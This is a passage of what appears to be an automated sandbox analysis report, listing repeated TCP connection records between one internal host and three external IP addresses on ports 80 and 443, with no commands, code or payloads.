            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 208.64.171.230:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 208.64.171.230:443
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 23.94.148.16:80
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 23.94.148.16:80 -> 192.168.2.22:49170
